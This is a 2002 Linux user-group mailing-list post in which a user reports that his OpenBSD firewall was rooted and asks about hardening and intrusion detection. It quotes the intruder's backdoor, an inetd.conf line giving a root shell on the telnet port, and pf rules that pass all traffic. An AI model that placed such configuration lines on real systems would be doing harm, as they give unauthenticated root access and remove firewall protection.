[Gllug] My firewall is rooted

Stephen Harker steve at pauken.co.uk
Mon Jul 15 12:26:45 UTC 2002

On Monday 15 July 2002 12:29, Xander D Harkness wrote:
> I would expect there to be at least two or three back doors.

Well here's one...
My inetd.conf file was renamed to inetd.conf.gay
and the new one says...

telnet stream tcp nowait root /bin/ksh ksh

So thats pretty obvious.
And my pf.conf rule became pf.conf.gay and the new one says...

pass in all
pass out all

Which doesn't make it much of a firewall anymore :-(
CRAP!!

I've just downloaded a big article/how-to about hardening OpenBSD.
Shall I investigate SNORT or any of those other sorts of things. I've not
bothered up till now but I think after this, I should take it all a bit more
seriously!!
Is OpenBSD any better/worse than Linux/Smoothwall etc? I guess if you've
switched off all the services, it's just down to your filtering rules and the
kernel.

Steve
--
Stephen Harker
steve at pauken.co.uk

"The sooner we fall behind, the longer we have to catch up!"

Gllug mailing list  -  Gllug at linux.co.uk